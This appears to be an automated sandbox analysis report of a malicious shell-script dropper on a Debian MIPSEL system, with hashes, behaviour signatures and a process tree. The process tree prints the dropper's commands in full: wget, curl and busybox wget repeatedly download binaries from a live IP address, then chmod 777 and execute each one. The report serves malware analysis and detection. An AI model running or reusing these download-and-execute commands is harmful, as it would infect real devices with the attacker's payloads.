Analysis
-
max time kernel
64s -
max time network
67s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
-
submitted
21-11-2024 08:17
General
-
Target
c0cb0d90ee7ff4503eb0a9f9cbca50981a86f477a499f920243ac6bb263bbfa1.sh
-
Size
10KB
-
MD5
bb029aab8a7891c04069f60088312995
-
SHA1
515224677ec506e44a6d344ff8edf84789fc08ea
-
SHA256
c0cb0d90ee7ff4503eb0a9f9cbca50981a86f477a499f920243ac6bb263bbfa1
-
SHA512
dd9af47bb73cbc6d79efb7139d78732d532d3acb06629a8834f98e836aa5cbd249409043331509946caf2469f9959bd3e481e7bfa1a30cb3575e283a17617356
-
SSDEEP
192:mI4f7nvXhnvXhnvX4ZX374oMaXDPHRHRHc9ZG8I4V7COtG6Lhh99lnzvXu76Gksx:ATv9v9vwHowBBc9Z9nW5K7WG56q2ne7K
Score
7/10
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
Reads runtime system information 28 IoCs
Reads data from /proc virtual filesystem.
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/c0cb0d90ee7ff4503eb0a9f9cbca50981a86f477a499f920243ac6bb263bbfa1.sh/tmp/c0cb0d90ee7ff4503eb0a9f9cbca50981a86f477a499f920243ac6bb263bbfa1.sh1⤵
-
/bin/rm/bin/rm bins.sh2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW2⤵
-
-
/bin/chmodchmod 777 SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW2⤵
- File and Directory Permissions Modification
-
-
/tmp/SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW./SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW2⤵
- Executes dropped EXE
-
-
/bin/rmrm SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg2⤵
-
-
/bin/chmodchmod 777 vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg2⤵
- File and Directory Permissions Modification
-
-
/tmp/vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg./vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg2⤵
- Executes dropped EXE
-
-
/bin/rmrm vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/0xAUqBtxYzscUUXZytllctNeDQXesIeHFK2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/0xAUqBtxYzscUUXZytllctNeDQXesIeHFK2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/0xAUqBtxYzscUUXZytllctNeDQXesIeHFK2⤵
-
-
/bin/chmodchmod 777 0xAUqBtxYzscUUXZytllctNeDQXesIeHFK2⤵
- File and Directory Permissions Modification
-
-
/tmp/0xAUqBtxYzscUUXZytllctNeDQXesIeHFK./0xAUqBtxYzscUUXZytllctNeDQXesIeHFK2⤵
- Executes dropped EXE
-
-
/bin/rmrm 0xAUqBtxYzscUUXZytllctNeDQXesIeHFK2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p2⤵
-
-
/bin/chmodchmod 777 Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p2⤵
- File and Directory Permissions Modification
-
-
/tmp/Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p./Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p2⤵
- Executes dropped EXE
-
-
/bin/rmrm Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm2⤵
-
-
/bin/chmodchmod 777 RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm2⤵
- File and Directory Permissions Modification
-
-
/tmp/RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm./RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm2⤵
- Executes dropped EXE
-
-
/bin/rmrm RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/yuFnig7SLqukn75LnZmw06l61kE18cmyJU2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/yuFnig7SLqukn75LnZmw06l61kE18cmyJU2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/yuFnig7SLqukn75LnZmw06l61kE18cmyJU2⤵
-
-
/bin/chmodchmod 777 yuFnig7SLqukn75LnZmw06l61kE18cmyJU2⤵
- File and Directory Permissions Modification
-
-
/tmp/yuFnig7SLqukn75LnZmw06l61kE18cmyJU./yuFnig7SLqukn75LnZmw06l61kE18cmyJU2⤵
- Executes dropped EXE
-
-
/bin/rmrm yuFnig7SLqukn75LnZmw06l61kE18cmyJU2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX2⤵
-
-
/bin/chmodchmod 777 D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX2⤵
- File and Directory Permissions Modification
-
-
/tmp/D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX./D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX2⤵
- Executes dropped EXE
-
-
/bin/rmrm D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/5UsXnRC524zBEEk2TH0apfry8KrElbTlAH2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/5UsXnRC524zBEEk2TH0apfry8KrElbTlAH2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/5UsXnRC524zBEEk2TH0apfry8KrElbTlAH2⤵
-
-
/bin/chmodchmod 777 5UsXnRC524zBEEk2TH0apfry8KrElbTlAH2⤵
- File and Directory Permissions Modification
-
-
/tmp/5UsXnRC524zBEEk2TH0apfry8KrElbTlAH./5UsXnRC524zBEEk2TH0apfry8KrElbTlAH2⤵
- Executes dropped EXE
-
-
/bin/rmrm 5UsXnRC524zBEEk2TH0apfry8KrElbTlAH2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O2⤵
-
-
/bin/chmodchmod 777 cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O2⤵
- File and Directory Permissions Modification
-
-
/tmp/cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O./cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O2⤵
- Executes dropped EXE
-
-
/bin/rmrm cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY2⤵
-
-
/bin/chmodchmod 777 buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY2⤵
- File and Directory Permissions Modification
-
-
/tmp/buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY./buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY2⤵
- Executes dropped EXE
-
-
/bin/rmrm buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx2⤵
-
-
/bin/chmodchmod 777 Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx2⤵
- File and Directory Permissions Modification
-
-
/tmp/Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx./Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx2⤵
- Executes dropped EXE
-
-
/bin/rmrm Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r2⤵
-
-
/bin/chmodchmod 777 WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r2⤵
- File and Directory Permissions Modification
-
-
/tmp/WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r./WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r2⤵
- Executes dropped EXE
-
-
/bin/rmrm WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv2⤵
-
-
/bin/chmodchmod 777 fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv2⤵
- File and Directory Permissions Modification
-
-
/tmp/fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv./fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv2⤵
- Executes dropped EXE
-
-
/bin/rmrm fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/KB2adoRmT7A3D3lUQ4D65uW54MCsodafV62⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/KB2adoRmT7A3D3lUQ4D65uW54MCsodafV62⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/KB2adoRmT7A3D3lUQ4D65uW54MCsodafV62⤵
-
-
/bin/chmodchmod 777 KB2adoRmT7A3D3lUQ4D65uW54MCsodafV62⤵
- File and Directory Permissions Modification
-
-
/tmp/KB2adoRmT7A3D3lUQ4D65uW54MCsodafV6./KB2adoRmT7A3D3lUQ4D65uW54MCsodafV62⤵
- Executes dropped EXE
-
-
/bin/rmrm KB2adoRmT7A3D3lUQ4D65uW54MCsodafV62⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r2⤵
-
-
/bin/chmodchmod 777 WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r2⤵
- File and Directory Permissions Modification
-
-
/tmp/WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r./WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r2⤵
- Executes dropped EXE
-
-
/bin/rmrm WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY2⤵
-
-
/bin/chmodchmod 777 buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY2⤵
- File and Directory Permissions Modification
-
-
/tmp/buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY./buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY2⤵
- Executes dropped EXE
-
-
/bin/rmrm buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx2⤵
-
-
/bin/chmodchmod 777 Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx2⤵
- File and Directory Permissions Modification
-
-
/tmp/Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx./Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx2⤵
- Executes dropped EXE
-
-
/bin/rmrm Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv2⤵
-
-
/bin/chmodchmod 777 fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv2⤵
- File and Directory Permissions Modification
-
-
/tmp/fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv./fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv2⤵
- Executes dropped EXE
-
-
/bin/rmrm fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/KB2adoRmT7A3D3lUQ4D65uW54MCsodafV62⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/KB2adoRmT7A3D3lUQ4D65uW54MCsodafV62⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/KB2adoRmT7A3D3lUQ4D65uW54MCsodafV62⤵
-
-
/bin/chmodchmod 777 KB2adoRmT7A3D3lUQ4D65uW54MCsodafV62⤵
- File and Directory Permissions Modification
-
-
/tmp/KB2adoRmT7A3D3lUQ4D65uW54MCsodafV6./KB2adoRmT7A3D3lUQ4D65uW54MCsodafV62⤵
- Executes dropped EXE
-
-
/bin/rmrm KB2adoRmT7A3D3lUQ4D65uW54MCsodafV62⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/0xAUqBtxYzscUUXZytllctNeDQXesIeHFK2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/0xAUqBtxYzscUUXZytllctNeDQXesIeHFK2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/0xAUqBtxYzscUUXZytllctNeDQXesIeHFK2⤵
-
-
/bin/chmodchmod 777 0xAUqBtxYzscUUXZytllctNeDQXesIeHFK2⤵
- File and Directory Permissions Modification
-
-
/tmp/0xAUqBtxYzscUUXZytllctNeDQXesIeHFK./0xAUqBtxYzscUUXZytllctNeDQXesIeHFK2⤵
- Executes dropped EXE
-
-
/bin/rmrm 0xAUqBtxYzscUUXZytllctNeDQXesIeHFK2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW2⤵
-
-
/bin/chmodchmod 777 SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW2⤵
- File and Directory Permissions Modification
-
-
/tmp/SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW./SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW2⤵
- Executes dropped EXE
-
-
/bin/rmrm SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg2⤵
-
-
/bin/chmodchmod 777 vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg2⤵
- File and Directory Permissions Modification
-
-
/tmp/vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg./vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg2⤵
- Executes dropped EXE
-
-
/bin/rmrm vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/yuFnig7SLqukn75LnZmw06l61kE18cmyJU2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/yuFnig7SLqukn75LnZmw06l61kE18cmyJU2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/yuFnig7SLqukn75LnZmw06l61kE18cmyJU2⤵
-
-
/bin/chmodchmod 777 yuFnig7SLqukn75LnZmw06l61kE18cmyJU2⤵
- File and Directory Permissions Modification
-
-
/tmp/yuFnig7SLqukn75LnZmw06l61kE18cmyJU./yuFnig7SLqukn75LnZmw06l61kE18cmyJU2⤵
- Executes dropped EXE
-
-
/bin/rmrm yuFnig7SLqukn75LnZmw06l61kE18cmyJU2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX2⤵
-
-
/bin/chmodchmod 777 D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX2⤵
- File and Directory Permissions Modification
-
-
/tmp/D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX./D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX2⤵
- Executes dropped EXE
-
-
/bin/rmrm D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/5UsXnRC524zBEEk2TH0apfry8KrElbTlAH2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/5UsXnRC524zBEEk2TH0apfry8KrElbTlAH2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/5UsXnRC524zBEEk2TH0apfry8KrElbTlAH2⤵
-
-
/bin/chmodchmod 777 5UsXnRC524zBEEk2TH0apfry8KrElbTlAH2⤵
- File and Directory Permissions Modification
-
-
/tmp/5UsXnRC524zBEEk2TH0apfry8KrElbTlAH./5UsXnRC524zBEEk2TH0apfry8KrElbTlAH2⤵
- Executes dropped EXE
-
-
/bin/rmrm 5UsXnRC524zBEEk2TH0apfry8KrElbTlAH2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O2⤵
-
-
/bin/chmodchmod 777 cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O2⤵
- File and Directory Permissions Modification
-
-
/tmp/cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O./cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O2⤵
- Executes dropped EXE
-
-
/bin/rmrm cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p2⤵
-
-
/bin/chmodchmod 777 Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p2⤵
- File and Directory Permissions Modification
-
-
/tmp/Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p./Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p2⤵
- Executes dropped EXE
-
-
/bin/rmrm Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm2⤵
-
-
/bin/chmodchmod 777 RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm2⤵
- File and Directory Permissions Modification
-
-
/tmp/RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm./RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm2⤵
- Executes dropped EXE
-
-
/bin/rmrm RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm2⤵
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97